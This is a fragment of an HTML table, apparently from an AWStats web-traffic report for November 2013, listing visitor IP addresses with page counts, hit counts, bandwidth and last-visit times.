<tr><td class="aws">46.165.15.76</td><td>96</td><td>96</td><td>1.09 MB</td><td>30 Nov 2013 - 20:55</td></tr>
<tr><td class="aws">95.106.239.121</td><td>96</td><td>223</td><td>24.61 MB</td><td>29 Nov 2013 - 08:57</td></tr>
<tr><td class="aws">81.195.135.146</td><td>96</td><td>122</td><td>1.74 MB</td><td>27 Nov 2013 - 12:38</td></tr>
<tr><td class="aws">79.104.34.40</td><td>96</td><td>660</td><td>28.41 MB</td><td>28 Nov 2013 - 08:05</td></tr>
<tr><td class="aws">78.158.192.196</td><td>95</td><td>215</td><td>15.00 MB</td><td>29 Nov 2013 - 11:19</td></tr>
<tr><td class="aws">188.123.252.99</td><td>95</td><td>120</td><td>1.63 MB</td><td>23 Nov 2013 - 17:58</td></tr>
<tr><td class="aws">208.177.76.12</td><td>95</td><td>95</td><td>4.18 MB</td><td>24 Nov 2013 - 05:51</td></tr>
<tr><td class="aws">212.33.17.130</td><td>95</td><td>182</td><td>22.87 MB</td><td>26 Nov 2013 - 16:10</td></tr>
<tr><td class="aws">193.41.77.127</td><td>95</td><td>269</td><td>18.80 MB</td><td>11 Nov 2013 - 14:14</td></tr>
<tr><td class="aws">89.175.230.19</td><td>95</td><td>95</td><td>1.08 MB</td><td>29 Nov 2013 - 12:42</td></tr>
<tr><td class="aws">77.43.144.228</td><td>94</td><td>94</td><td>1.34 MB</td><td>29 Nov 2013 - 20:19</td></tr>
<tr><td class="aws">212.41.32.107</td><td>94</td><td>448</td><td>20.71 MB</td><td>28 Nov 2013 - 16:44</td></tr>
<tr><td class="aws">188.244.37.5</td><td>94</td><td>614</td><td>45.76 MB</td><td>28 Nov 2013 - 12:20</td></tr>
<tr><td class="aws">188.123.237.163</td><td>94</td><td>283</td><td>7.01 MB</td><td>29 Nov 2013 - 13:29</td></tr>
<tr><td class="aws">194.67.121.45</td><td>94</td><td>138</td><td>15.43 MB</td><td>30 Nov 2013 - 20:22</td></tr>
<tr><td class="aws">83.233.207.74</td><td>93</td><td>93</td><td>1.06 MB</td><td>17 Nov 2013 - 09:18</td></tr>
<tr><td class="aws">85.21.148.66</td><td>93</td><td>296</td><td>32.36 MB</td><td>18 Nov 2013 - 14:36</td></tr>
<tr><td class="aws">188.32.140.154</td><td>93</td><td>320</td><td>19.19 MB</td><td>19 Nov 2013 - 16:58</td></tr>
<tr><td class="aws">217.151.131.23</td><td>93</td><td>455</td><td>17.70 MB</td><td>29 Nov 2013 - 10:50</td></tr>
<tr><td class="aws">193.104.149.143</td><td>93</td><td>405</td><td>27.15 MB</td><td>29 Nov 2013 - 14:47</td></tr>
<tr><td class="aws">92.42.40.74</td><td>93</td><td>363</td><td>10.81 MB</td><td>18 Nov 2013 - 15:14</td></tr>
<tr><td class="aws">217.19.210.234</td><td>93</td><td>93</td><td>1.27 MB</td><td>29 Nov 2013 - 18:02</td></tr>
<tr><td class="aws">128.72.85.62</td><td>93</td><td>93</td><td>949.73 KB</td><td>24 Nov 2013 - 23:30</td></tr>
<tr><td class="aws">95.173.131.18</td><td>93</td><td>551</td><td>74.30 MB</td><td>28 Nov 2013 - 19:10</td></tr>
<tr><td class="aws">94.29.127.67</td><td>93</td><td>394</td><td>18.65 MB</td><td>29 Nov 2013 - 14:07</td></tr>
<tr><td class="aws">217.33.154.234</td><td>93</td><td>223</td><td>5.50 MB</td><td>26 Nov 2013 - 12:48</td></tr>
<tr><td class="aws">155.91.64.11</td><td>92</td><td>526</td><td>27.75 MB</td><td>27 Nov 2013 - 23:45</td></tr>
<tr><td class="aws">46.242.82.92</td><td>92</td><td>455</td><td>27.74 MB</td><td>28 Nov 2013 - 22:13</td></tr>
<tr><td class="aws">5.228.83.174</td><td>92</td><td>121</td><td>1.85 MB</td><td>23 Nov 2013 - 21:22</td></tr>
<tr><td class="aws">80.247.35.63</td><td>92</td><td>408</td><td>15.84 MB</td><td>25 Nov 2013 - 18:37</td></tr>
<tr><td class="aws">91.103.66.204</td><td>92</td><td>459</td><td>13.05 MB</td><td>30 Nov 2013 - 04:59</td></tr>
<tr><td class="aws">89.178.203.139</td><td>92</td><td>205</td><td>40.51 MB</td><td>04 Nov 2013 - 22:06</td></tr>
<tr><td class="aws">213.171.50.69</td><td>92</td><td>171</td><td>11.30 MB</td><td>19 Nov 2013 - 13:01</td></tr>
<tr><td class="aws">212.12.65.153</td><td>92</td><td>262</td><td>26.10 MB</td><td>28 Nov 2013 - 09:24</td></tr>
<tr><td class="aws">217.12.117.194</td><td>92</td><td>92</td><td>1.07 MB</td><td>29 Nov 2013 - 17:03</td></tr>
<tr><td class="aws">193.109.114.149</td><td>91</td><td>676</td><td>13.31 MB</td><td>28 Nov 2013 - 16:57</td></tr>
<tr><td class="aws">46.188.2.3</td><td>91</td><td>654</td><td>32.83 MB</td><td>28 Nov 2013 - 10:55</td></tr>
<tr><td class="aws">94.29.127.36</td><td>91</td><td>270</td><td>29.12 MB</td><td>22 Nov 2013 - 15:31</td></tr>
<tr><td class="aws">80.71.251.212</td><td>91</td><td>91</td><td>905.05 KB</td><td>26 Nov 2013 - 13:18</td></tr>
<tr><td class="aws">91.77.49.112</td><td>91</td><td>227</td><td>6.52 MB</td><td>10 Nov 2013 - 18:25</td></tr>
<tr><td class="aws">217.74.41.30</td><td>91</td><td>515</td><td>20.67 MB</td><td>27 Nov 2013 - 18:17</td></tr>
<tr><td class="aws">147.30.208.103</td><td>90</td><td>90</td><td>1.04 MB</td><td>30 Nov 2013 - 21:09</td></tr>
<tr><td class="aws">213.33.228.98</td><td>90</td><td>266</td><td>6.45 MB</td><td>06 Nov 2013 - 16:34</td></tr>
<tr><td class="aws">77.246.100.3</td><td>90</td><td>134</td><td>12.68 MB</td><td>29 Nov 2013 - 15:24</td></tr>
<tr><td class="aws">213.87.137.56</td><td>90</td><td>220</td><td>14.66 MB</td><td>18 Nov 2013 - 13:39</td></tr>
<tr><td class="aws">93.91.5.170</td><td>90</td><td>179</td><td>15.37 MB</td><td>29 Nov 2013 - 15:43</td></tr>
<tr><td class="aws">217.171.5.120</td><td>90</td><td>133</td><td>4.20 MB</td><td>20 Nov 2013 - 09:12</td></tr>
<tr><td class="aws">31.129.134.121</td><td>90</td><td>115</td><td>1.82 MB</td><td>27 Nov 2013 - 12:44</td></tr>
<tr><td class="aws">94.153.9.210</td><td>90</td><td>90</td><td>3.63 MB</td><td>28 Nov 2013 - 20:21</td></tr>
<tr><td class="aws">77.37.200.113</td><td>90</td><td>335</td><td>82.75 MB</td><td>06 Nov 2013 - 17:23</td></tr>
<tr><td class="aws">77.243.100.187</td><td>90</td><td>133</td><td>3.29 MB</td><td>29 Nov 2013 - 14:50</td></tr>
<tr><td class="aws">109.252.14.70</td><td>90</td><td>173</td><td>13.50 MB</td><td>13 Nov 2013 - 18:19</td></tr>
<tr><td class="aws">176.8.90.175</td><td>90</td><td>90</td><td>3.63 MB</td><td>28 Nov 2013 - 20:04</td></tr>
<tr><td class="aws">80.66.73.242</td><td>90</td><td>141</td><td>4.27 MB</td><td>25 Nov 2013 - 07:59</td></tr>
<tr><td class="aws">91.78.196.134</td><td>90</td><td>421</td><td>59.34 MB</td><td>26 Nov 2013 - 22:16</td></tr>
<tr><td class="aws">178.215.97.47</td><td>89</td><td>411</td><td>87.68 MB</td><td>28 Nov 2013 - 12:11</td></tr>
<tr><td class="aws">46.188.11.3</td><td>89</td><td>546</td><td>35.58 MB</td><td>28 Nov 2013 - 21:32</td></tr>
<tr><td class="aws">206.108.32.59</td><td>89</td><td>90</td><td>4.08 MB</td><td>04 Nov 2013 - 09:02</td></tr>
<tr><td class="aws">109.188.127.60</td><td>89</td><td>281</td><td>11.56 MB</td><td>30 Nov 2013 - 17:56</td></tr>
<tr><td class="aws">89.250.3.133</td><td>89</td><td>345</td><td>17.71 MB</td><td>30 Nov 2013 - 22:48</td></tr>
<tr><td class="aws">95.165.47.59</td><td>89</td><td>168</td><td>10.73 MB</td><td>22 Nov 2013 - 16:13</td></tr>
<tr><td class="aws">188.123.245.14</td><td>89</td><td>195</td><td>6.50 MB</td><td>23 Nov 2013 - 18:56</td></tr>
<tr><td class="aws">188.32.220.134</td><td>89</td><td>434</td><td>20.91 MB</td><td>29 Nov 2013 - 21:44</td></tr>
<tr><td class="aws">188.255.126.249</td><td>88</td><td>116</td><td>1.77 MB</td><td>30 Nov 2013 - 20:21</td></tr>
<tr><td class="aws">94.127.221.253</td><td>88</td><td>118</td><td>1.60 MB</td><td>29 Nov 2013 - 16:33</td></tr>
<tr><td class="aws">194.67.119.58</td><td>88</td><td>88</td><td>923.16 KB</td><td>26 Nov 2013 - 10:49</td></tr>
<tr><td class="aws">62.33.7.174</td><td>88</td><td>146</td><td>4.42 MB</td><td>25 Nov 2013 - 09:44</td></tr>
<tr><td class="aws">128.68.52.67</td><td>88</td><td>152</td><td>3.00 MB</td><td>21 Nov 2013 - 17:43</td></tr>
<tr><td class="aws">77.37.224.120</td><td>88</td><td>88</td><td>958.02 KB</td><td>17 Nov 2013 - 06:26</td></tr>
<tr><td class="aws">188.123.230.181</td><td>88</td><td>457</td><td>21.54 MB</td><td>30 Nov 2013 - 11:06</td></tr>
<tr><td class="aws">188.126.45.58</td><td>88</td><td>274</td><td>15.84 MB</td><td>28 Nov 2013 - 10:31</td></tr>
<tr><td class="aws">79.120.15.2</td><td>88</td><td>150</td><td>2.57 MB</td><td>30 Nov 2013 - 13:32</td></tr>
<tr><td class="aws">194.85.9.152</td><td>88</td><td>296</td><td>5.06 MB</td><td>19 Nov 2013 - 10:37</td></tr>
<tr><td class="aws">194.0.219.5</td><td>88</td><td>551</td><td>60.55 MB</td><td>29 Nov 2013 - 09:36</td></tr>
<tr><td class="aws">109.252.142.220</td><td>88</td><td>88</td><td>912.61 KB</td><td>17 Nov 2013 - 19:12</td></tr>
<tr><td class="aws">188.123.248.84</td><td>88</td><td>112</td><td>1.64 MB</td><td>30 Nov 2013 - 18:41</td></tr>
<tr><td class="aws">195.208.85.216</td><td>88</td><td>287</td><td>16.00 MB</td><td>29 Nov 2013 - 15:11</td></tr>
<tr><td class="aws">91.226.175.142</td><td>87</td><td>87</td><td>887.34 KB</td><td>30 Nov 2013 - 20:17</td></tr>
<tr><td class="aws">217.151.131.13</td><td>87</td><td>487</td><td>22.34 MB</td><td>27 Nov 2013 - 12:38</td></tr>
<tr><td class="aws">93.80.12.16</td><td>87</td><td>574</td><td>114.49 MB</td><td>11 Nov 2013 - 18:19</td></tr>
<tr><td class="aws">37.204.144.168</td><td>87</td><td>87</td><td>952.74 KB</td><td>30 Nov 2013 - 22:00</td></tr>
<tr><td class="aws">87.228.56.238</td><td>87</td><td>193</td><td>21.37 MB</td><td>23 Nov 2013 - 15:18</td></tr>
<tr><td class="aws">46.119.97.229</td><td>87</td><td>140</td><td>4.45 MB</td><td>01 Nov 2013 - 22:01</td></tr>
<tr><td class="aws">46.29.153.110</td><td>87</td><td>395</td><td>30.20 MB</td><td>27 Nov 2013 - 13:56</td></tr>
<tr><td class="aws">93.185.192.71</td><td>87</td><td>250</td><td>8.00 MB</td><td>15 Nov 2013 - 08:21</td></tr>
<tr><td class="aws">128.69.189.62</td><td>86</td><td>86</td><td>912.26 KB</td><td>29 Nov 2013 - 03:20</td></tr>
<tr><td class="aws">91.226.165.116</td><td>86</td><td>425</td><td>40.10 MB</td><td>16 Nov 2013 - 20:23</td></tr>
<tr><td class="aws">188.244.43.66</td><td>86</td><td>618</td><td>26.99 MB</td><td>27 Nov 2013 - 21:18</td></tr>
<tr><td class="aws">82.138.29.190</td><td>86</td><td>562</td><td>34.67 MB</td><td>29 Nov 2013 - 07:56</td></tr>
<tr><td class="aws">89.169.220.71</td><td>86</td><td>132</td><td>2.34 MB</td><td>30 Nov 2013 - 23:56</td></tr>
<tr><td class="aws">193.110.115.255</td><td>86</td><td>111</td><td>5.03 MB</td><td>27 Nov 2013 - 16:58</td></tr>
<tr><td class="aws">195.209.222.101</td><td>86</td><td>112</td><td>1.74 MB</td><td>29 Nov 2013 - 18:15</td></tr>
<tr><td class="aws">66.249.82.56</td><td>85</td><td>1475</td><td>41.23 MB</td><td>30 Nov 2013 - 12:23</td></tr>
<tr><td class="aws">212.45.6.2</td><td>85</td><td>268</td><td>63.28 MB</td><td>25 Nov 2013 - 12:46</td></tr>
<tr><td class="aws">109.188.124.57</td><td>85</td><td>524</td><td>51.81 MB</td><td>29 Nov 2013 - 22:39</td></tr>
<tr><td class="aws">77.87.207.3</td><td>85</td><td>246</td><td>12.93 MB</td><td>25 Nov 2013 - 17:26</td></tr>
<tr><td class="aws">81.200.81.2</td><td>85</td><td>454</td><td>24.67 MB</td><td>29 Nov 2013 - 18:53</td></tr>
<tr><td class="aws">77.91.198.233</td><td>85</td><td>544</td><td>21.09 MB</td><td>28 Nov 2013 - 11:23</td></tr>
<tr><td class="aws">46.39.228.90</td><td>85</td><td>362</td><td>24.86 MB</td><td>13 Nov 2013 - 15:37</td></tr>
<tr><td class="aws">178.215.99.27</td><td>85</td><td>402</td><td>21.81 MB</td><td>28 Nov 2013 - 15:25</td></tr>
<tr><td class="aws">91.77.193.147</td><td>85</td><td>294</td><td>11.88 MB</td><td>30 Nov 2013 - 15:45</td></tr>
<tr><td class="aws">95.84.151.141</td><td>85</td><td>130</td><td>4.41 MB</td><td>15 Nov 2013 - 14:59</td></tr>
<tr><td class="aws">109.188.90.235</td><td>85</td><td>179</td><td>22.02 MB</td><td>28 Nov 2013 - 11:02</td></tr>
<tr><td class="aws">188.123.237.161</td><td>84</td><td>110</td><td>1.62 MB</td><td>29 Nov 2013 - 13:00</td></tr>
<tr><td class="aws">91.79.251.167</td><td>84</td><td>235</td><td>16.39 MB</td><td>16 Nov 2013 - 15:06</td></tr>
<tr><td class="aws">46.150.172.92</td><td>84</td><td>295</td><td>32.26 MB</td><td>30 Nov 2013 - 11:34</td></tr>
<tr><td class="aws">89.20.143.82</td><td>84</td><td>202</td><td>14.19 MB</td><td>22 Nov 2013 - 14:21</td></tr>
<tr><td class="aws">188.123.231.169</td><td>84</td><td>347</td><td>17.83 MB</td><td>30 Nov 2013 - 09:53</td></tr>
<tr><td class="aws">37.115.188.149</td><td>84</td><td>84</td><td>3.52 MB</td><td>15 Nov 2013 - 20:51</td></tr>
<tr><td class="aws">176.14.34.100</td><td>84</td><td>712</td><td>128.95 MB</td><td>11 Nov 2013 - 07:36</td></tr>
<tr><td class="aws">83.149.192.8</td><td>84</td><td>196</td><td>4.27 MB</td><td>27 Nov 2013 - 11:25</td></tr>
<tr><td class="aws">89.107.26.76</td><td>84</td><td>142</td><td>2.43 MB</td><td>29 Nov 2013 - 16:14</td></tr>
<tr><td class="aws">188.123.230.161</td><td>84</td><td>145</td><td>2.69 MB</td><td>30 Nov 2013 - 22:57</td></tr>
<tr><td class="aws">94.29.27.184</td><td>84</td><td>313</td><td>22.95 MB</td><td>29 Nov 2013 - 16:37</td></tr>
<tr><td class="aws">188.254.105.132</td><td>83</td><td>1084</td><td>12.59 MB</td><td>27 Nov 2013 - 15:15</td></tr>
<tr><td class="aws">188.244.41.3</td><td>83</td><td>317</td><td>15.13 MB</td><td>30 Nov 2013 - 21:53</td></tr>
<tr><td class="aws">91.123.22.120</td><td>83</td><td>83</td><td>943.60 KB</td><td>25 Nov 2013 - 21:23</td></tr>
<tr><td class="aws">83.237.23.224</td><td>83</td><td>180</td><td>16.89 MB</td><td>24 Nov 2013 - 22:16</td></tr>
<tr><td class="aws">200.66.69.21</td><td>83</td><td>85</td><td>3.86 MB</td><td>25 Nov 2013 - 22:33</td></tr>
<tr><td class="aws">5.228.125.36</td><td>83</td><td>83</td><td>967.75 KB</td><td>30 Nov 2013 - 17:18</td></tr>
<tr><td class="aws">212.41.32.116</td><td>83</td><td>402</td><td>30.17 MB</td><td>28 Nov 2013 - 00:11</td></tr>
<tr><td class="aws">178.49.199.209</td><td>83</td><td>107</td><td>1.66 MB</td><td>26 Nov 2013 - 03:44</td></tr>
<tr><td class="aws">213.251.211.210</td><td>82</td><td>168</td><td>6.34 MB</td><td>16 Nov 2013 - 00:15</td></tr>
<tr><td class="aws">188.123.245.8</td><td>82</td><td>139</td><td>2.83 MB</td><td>30 Nov 2013 - 15:02</td></tr>
<tr><td class="aws">178.140.39.221</td><td>82</td><td>216</td><td>25.79 MB</td><td>02 Nov 2013 - 22:45</td></tr>
<tr><td class="aws">79.165.203.161</td><td>82</td><td>304</td><td>31.97 MB</td><td>29 Nov 2013 - 17:19</td></tr>
<tr><td class="aws">77.37.225.235</td><td>82</td><td>322</td><td>38.89 MB</td><td>05 Nov 2013 - 13:34</td></tr>
<tr><td class="aws">213.79.117.194</td><td>82</td><td>311</td><td>8.25 MB</td><td>29 Nov 2013 - 15:04</td></tr>
<tr><td class="aws">92.243.167.155</td><td>82</td><td>263</td><td>10.12 MB</td><td>30 Nov 2013 - 21:43</td></tr>
<tr><td class="aws">79.165.145.55</td><td>82</td><td>107</td><td>1.51 MB</td><td>29 Nov 2013 - 21:10</td></tr>
<tr><td class="aws">195.200.213.50</td><td>82</td><td>493</td><td>16.10 MB</td><td>21 Nov 2013 - 14:54</td></tr>
<tr><td class="aws">82.149.215.54</td><td>82</td><td>302</td><td>25.44 MB</td><td>28 Nov 2013 - 13:23</td></tr>
<tr><td class="aws">213.85.82.15</td><td>82</td><td>408</td><td>29.94 MB</td><td>29 Nov 2013 - 13:08</td></tr>
<tr><td class="aws">83.166.112.106</td><td>82</td><td>419</td><td>14.82 MB</td><td>22 Nov 2013 - 13:07</td></tr>
<tr><td class="aws">5.228.92.143</td><td>82</td><td>251</td><td>16.05 MB</td><td>26 Nov 2013 - 13:09</td></tr>
<tr><td class="aws">87.252.227.101</td><td>81</td><td>155</td><td>1.80 MB</td><td>30 Nov 2013 - 21:28</td></tr>
<tr><td class="aws">94.29.26.34</td><td>81</td><td>81</td><td>976.87 KB</td><td>30 Nov 2013 - 17:31</td></tr>
<tr><td class="aws">212.100.143.59</td><td>81</td><td>118</td><td>12.26 MB</td><td>29 Nov 2013 - 12:34</td></tr>
<tr><td class="aws">79.139.220.142</td><td>81</td><td>81</td><td>848.93 KB</td><td>30 Nov 2013 - 22:45</td></tr>
<tr><td class="aws">178.219.146.130</td><td>81</td><td>106</td><td>1.63 MB</td><td>26 Nov 2013 - 18:43</td></tr>
<tr><td class="aws">93.157.175.163</td><td>81</td><td>173</td><td>4.60 MB</td><td>25 Nov 2013 - 17:34</td></tr>
<tr><td class="aws">188.123.231.111</td><td>81</td><td>287</td><td>19.65 MB</td><td>18 Nov 2013 - 09:56</td></tr>
<tr><td class="aws">188.123.231.162</td><td>81</td><td>433</td><td>34.51 MB</td><td>29 Nov 2013 - 17:51</td></tr>
<tr><td class="aws">89.221.54.246</td><td>81</td><td>298</td><td>36.40 MB</td><td>12 Nov 2013 - 15:54</td></tr>
<tr><td class="aws">109.188.125.85</td><td>81</td><td>312</td><td>29.40 MB</td><td>27 Nov 2013 - 13:54</td></tr>
<tr><td class="aws">193.109.114.199</td><td>80</td><td>742</td><td>12.23 MB</td><td>28 Nov 2013 - 15:44</td></tr>
<tr><td class="aws">176.120.1.177</td><td>80</td><td>274</td><td>13.30 MB</td><td>14 Nov 2013 - 11:26</td></tr>
<tr><td class="aws">92.243.183.107</td><td>80</td><td>139</td><td>6.25 MB</td><td>30 Nov 2013 - 22:38</td></tr>
<tr><td class="aws">84.47.176.10</td><td>80</td><td>129</td><td>7.99 MB</td><td>29 Nov 2013 - 14:46</td></tr>
<tr><td class="aws">188.123.231.164</td><td>80</td><td>162</td><td>4.24 MB</td><td>30 Nov 2013 - 20:33</td></tr>
<tr><td class="aws">109.188.124.59</td><td>80</td><td>374</td><td>14.36 MB</td><td>29 Nov 2013 - 12:53</td></tr>
<tr><td class="aws">178.140.175.220</td><td>80</td><td>199</td><td>12.73 MB</td><td>07 Nov 2013 - 22:20</td></tr>
<tr><td class="aws">37.204.13.238</td><td>80</td><td>245</td><td>31.12 MB</td><td>12 Nov 2013 - 01:28</td></tr>
<tr><td class="aws">95.25.210.166</td><td>80</td><td>80</td><td>796.47 KB</td><td>22 Nov 2013 - 14:46</td></tr>
<tr><td class="aws">89.106.173.82</td><td>80</td><td>244</td><td>15.29 MB</td><td>29 Nov 2013 - 15:29</td></tr>
<tr><td class="aws">193.232.2.8</td><td>80</td><td>171</td><td>7.38 MB</td><td>29 Nov 2013 - 17:23</td></tr>
<tr><td class="aws">188.123.248.60</td><td>80</td><td>169</td><td>3.75 MB</td><td>29 Nov 2013 - 19:22</td></tr>
<tr><td class="aws">213.234.197.62</td><td>80</td><td>115</td><td>1.45 MB</td><td>29 Nov 2013 - 15:27</td></tr>
<tr><td class="aws">77.87.207.235</td><td>79</td><td>160</td><td>8.40 MB</td><td>25 Nov 2013 - 07:31</td></tr>
<tr><td class="aws">94.29.14.144</td><td>79</td><td>109</td><td>1.53 MB</td><td>30 Nov 2013 - 23:29</td></tr>
<tr><td class="aws">91.77.29.0</td><td>79</td><td>191</td><td>8.87 MB</td><td>09 Nov 2013 - 23:48</td></tr>
<tr><td class="aws">89.31.118.161</td><td>79</td><td>126</td><td>3.06 MB</td><td>30 Nov 2013 - 18:43</td></tr>
<tr><td class="aws">90.155.217.27</td><td>79</td><td>390</td><td>40.65 MB</td><td>26 Nov 2013 - 20:43</td></tr>
<tr><td class="aws">109.188.64.99</td><td>79</td><td>108</td><td>1.68 MB</td><td>19 Nov 2013 - 14:53</td></tr>
<tr><td class="aws">188.123.245.98</td><td>79</td><td>272</td><td>11.53 MB</td><td>16 Nov 2013 - 11:34</td></tr>
<tr><td class="aws">176.14.29.126</td><td>79</td><td>79</td><td>1.08 MB</td><td>27 Nov 2013 - 11:34</td></tr>
<tr><td class="aws">94.75.132.35</td><td>79</td><td>201</td><td>8.46 MB</td><td>07 Nov 2013 - 17:46</td></tr>
<tr><td class="aws">193.8.0.7</td><td>79</td><td>643</td><td>11.24 MB</td><td>28 Nov 2013 - 07:19</td></tr>
<tr><td class="aws">188.244.36.208</td><td>78</td><td>279</td><td>61.27 MB</td><td>12 Nov 2013 - 20:55</td></tr>
<tr><td class="aws">84.51.103.37</td><td>78</td><td>78</td><td>885.01 KB</td><td>12 Nov 2013 - 23:45</td></tr>
<tr><td class="aws">46.39.35.76</td><td>78</td><td>114</td><td>3.01 MB</td><td>30 Nov 2013 - 18:29</td></tr>
<tr><td class="aws">194.67.121.110</td><td>78</td><td>126</td><td>7.71 MB</td><td>24 Nov 2013 - 13:50</td></tr>
<tr><td class="aws">109.173.37.164</td><td>78</td><td>179</td><td>13.10 MB</td><td>29 Nov 2013 - 20:29</td></tr>
<tr><td class="aws">37.204.148.187</td><td>78</td><td>118</td><td>3.98 MB</td><td>30 Nov 2013 - 23:40</td></tr>
<tr><td class="aws">89.248.169.47</td><td>78</td><td>78</td><td>3.40 MB</td><td>30 Nov 2013 - 23:44</td></tr>
<tr><td class="aws">193.33.192.44</td><td>78</td><td>563</td><td>18.28 MB</td><td>28 Nov 2013 - 14:08</td></tr>
<tr><td class="aws">83.149.241.183</td><td>78</td><td>218</td><td>18.89 MB</td><td>27 Nov 2013 - 12:21</td></tr>
<tr><td class="aws">159.224.57.168</td><td>78</td><td>78</td><td>254.89 KB</td><td>01 Nov 2013 - 12:46</td></tr>
<tr><td class="aws">195.54.198.34</td><td>78</td><td>109</td><td>11.85 MB</td><td>29 Nov 2013 - 15:54</td></tr>
<tr><td class="aws">83.149.9.112</td><td>78</td><td>406</td><td>39.75 MB</td><td>27 Nov 2013 - 16:43</td></tr>
<tr><td class="aws">77.232.13.239</td><td>77</td><td>129</td><td>4.08 MB</td><td>30 Nov 2013 - 22:23</td></tr>
<tr><td class="aws">94.77.162.109</td><td>77</td><td>77</td><td>838.11 KB</td><td>17 Nov 2013 - 20:32</td></tr>
<tr><td class="aws">188.123.230.180</td><td>77</td><td>198</td><td>45.61 MB</td><td>16 Nov 2013 - 20:31</td></tr>
<tr><td class="aws">217.26.6.68</td><td>77</td><td>491</td><td>17.93 MB</td><td>30 Nov 2013 - 16:14</td></tr>
<tr><td class="aws">81.200.20.139</td><td>77</td><td>228</td><td>17.22 MB</td><td>13 Nov 2013 - 20:45</td></tr>
<tr><td class="aws">92.243.181.109</td><td>77</td><td>278</td><td>11.46 MB</td><td>21 Nov 2013 - 16:02</td></tr>
<tr><td class="aws">128.68.28.71</td><td>77</td><td>151</td><td>10.24 MB</td><td>08 Nov 2013 - 21:17</td></tr>
<tr><td class="aws">81.23.4.41</td><td>77</td><td>205</td><td>8.96 MB</td><td>19 Nov 2013 - 14:48</td></tr>
<tr><td class="aws">80.76.224.226</td><td>77</td><td>217</td><td>7.23 MB</td><td>20 Nov 2013 - 09:47</td></tr>
<tr><td class="aws">79.164.123.158</td><td>77</td><td>150</td><td>10.12 MB</td><td>06 Nov 2013 - 16:17</td></tr>
<tr><td class="aws">188.123.231.31</td><td>77</td><td>154</td><td>7.20 MB</td><td>30 Nov 2013 - 21:27</td></tr>
<tr><td class="aws">176.114.26.73</td><td>77</td><td>77</td><td>1.06 MB</td><td>19 Nov 2013 - 05:18</td></tr>
<tr><td class="aws">193.33.192.42</td><td>77</td><td>519</td><td>17.75 MB</td><td>28 Nov 2013 - 14:09</td></tr>
<tr><td class="aws">81.95.135.107</td><td>77</td><td>271</td><td>12.31 MB</td><td>29 Nov 2013 - 11:55</td></tr>
<tr><td class="aws">81.88.222.85</td><td>77</td><td>251</td><td>19.41 MB</td><td>30 Nov 2013 - 15:47</td></tr>
<tr><td class="aws">87.228.66.65</td><td>77</td><td>110</td><td>1.89 MB</td><td>30 Nov 2013 - 22:43</td></tr>
<tr><td class="aws">91.79.253.0</td><td>77</td><td>77</td><td>824.62 KB</td><td>30 Nov 2013 - 22:19</td></tr>
<tr><td class="aws">89.179.194.210</td><td>77</td><td>224</td><td>15.21 MB</td><td>11 Nov 2013 - 13:53</td></tr>
<tr><td class="aws">80.68.252.79</td><td>77</td><td>501</td><td>27.39 MB</td><td>20 Nov 2013 - 18:27</td></tr>
<tr><td class="aws">212.119.246.2</td><td>77</td><td>327</td><td>7.48 MB</td><td>18 Nov 2013 - 10:28</td></tr>
<tr><td class="aws">212.74.230.18</td><td>76</td><td>229</td><td>22.66 MB</td><td>20 Nov 2013 - 09:27</td></tr>
<tr><td class="aws">188.186.241.48</td><td>76</td><td>76</td><td>829.08 KB</td><td>30 Nov 2013 - 20:54</td></tr>
<tr><td class="aws">87.255.14.128</td><td>76</td><td>136</td><td>2.32 MB</td><td>30 Nov 2013 - 19:17</td></tr>
<tr><td class="aws">94.158.169.74</td><td>76</td><td>328</td><td>22.25 MB</td><td>28 Nov 2013 - 04:14</td></tr>
<tr><td class="aws">109.188.127.38</td><td>76</td><td>255</td><td>6.73 MB</td><td>27 Nov 2013 - 17:07</td></tr>
<tr><td class="aws">195.146.71.52</td><td>76</td><td>401</td><td>21.25 MB</td><td>28 Nov 2013 - 13:07</td></tr>
<tr><td class="aws">91.77.111.202</td><td>76</td><td>165</td><td>27.06 MB</td><td>19 Nov 2013 - 14:02</td></tr>
<tr><td class="aws">93.187.76.1</td><td>76</td><td>372</td><td>17.09 MB</td><td>25 Nov 2013 - 15:11</td></tr>
<tr><td class="aws">128.69.55.96</td><td>76</td><td>76</td><td>909.42 KB</td><td>12 Nov 2013 - 13:26</td></tr>
<tr><td class="aws">94.158.169.134</td><td>76</td><td>336</td><td>25.73 MB</td><td>29 Nov 2013 - 20:38</td></tr>
<tr><td class="aws">109.73.15.148</td><td>76</td><td>283</td><td>23.89 MB</td><td>15 Nov 2013 - 12:43</td></tr>
<tr><td class="aws">83.149.45.35</td><td>76</td><td>140</td><td>11.56 MB</td><td>22 Nov 2013 - 09:12</td></tr>
<tr><td class="aws">91.215.36.64</td><td>76</td><td>370</td><td>21.69 MB</td><td>21 Nov 2013 - 13:19</td></tr>
<tr><td class="aws">199.15.234.66</td><td>75</td><td>75</td><td>3.25 MB</td><td>30 Nov 2013 - 03:03</td></tr>
<tr><td class="aws">90.155.221.5</td><td>75</td><td>75</td><td>815.64 KB</td><td>30 Nov 2013 - 23:03</td></tr>
<tr><td class="aws">188.123.231.95</td><td>75</td><td>493</td><td>33.45 MB</td><td>30 Nov 2013 - 14:41</td></tr>
<tr><td class="aws">94.158.169.66</td><td>75</td><td>75</td><td>2.14 MB</td><td>29 Nov 2013 - 10:15</td></tr>
<tr><td class="aws">5.128.49.18</td><td>75</td><td>75</td><td>1.06 MB</td><td>08 Nov 2013 - 20:53</td></tr>
<tr><td class="aws">92.243.183.41</td><td>75</td><td>278</td><td>22.03 MB</td><td>28 Nov 2013 - 17:47</td></tr>
<tr><td class="aws">83.149.9.188</td><td>75</td><td>230</td><td>14.28 MB</td><td>27 Nov 2013 - 16:25</td></tr>
<tr><td class="aws">188.123.231.46</td><td>75</td><td>363</td><td>25.66 MB</td><td>30 Nov 2013 - 16:04</td></tr>
<tr><td class="aws">94.158.169.77</td><td>75</td><td>230</td><td>22.60 MB</td><td>30 Nov 2013 - 22:57</td></tr>
<tr><td class="aws">5.228.58.81</td><td>75</td><td>75</td><td>1.12 MB</td><td>29 Nov 2013 - 09:12</td></tr>
<tr><td class="aws">46.242.13.119</td><td>75</td><td>75</td><td>797.77 KB</td><td>22 Nov 2013 - 21:41</td></tr>
<tr><td class="aws">77.87.207.6</td><td>75</td><td>184</td><td>22.74 MB</td><td>30 Nov 2013 - 17:56</td></tr>
<tr><td class="aws">91.79.152.229</td><td>74</td><td>104</td><td>1.55 MB</td><td>18 Nov 2013 - 22:58</td></tr>
<tr><td class="aws">92.243.182.46</td><td>74</td><td>217</td><td>13.95 MB</td><td>28 Nov 2013 - 18:49</td></tr>
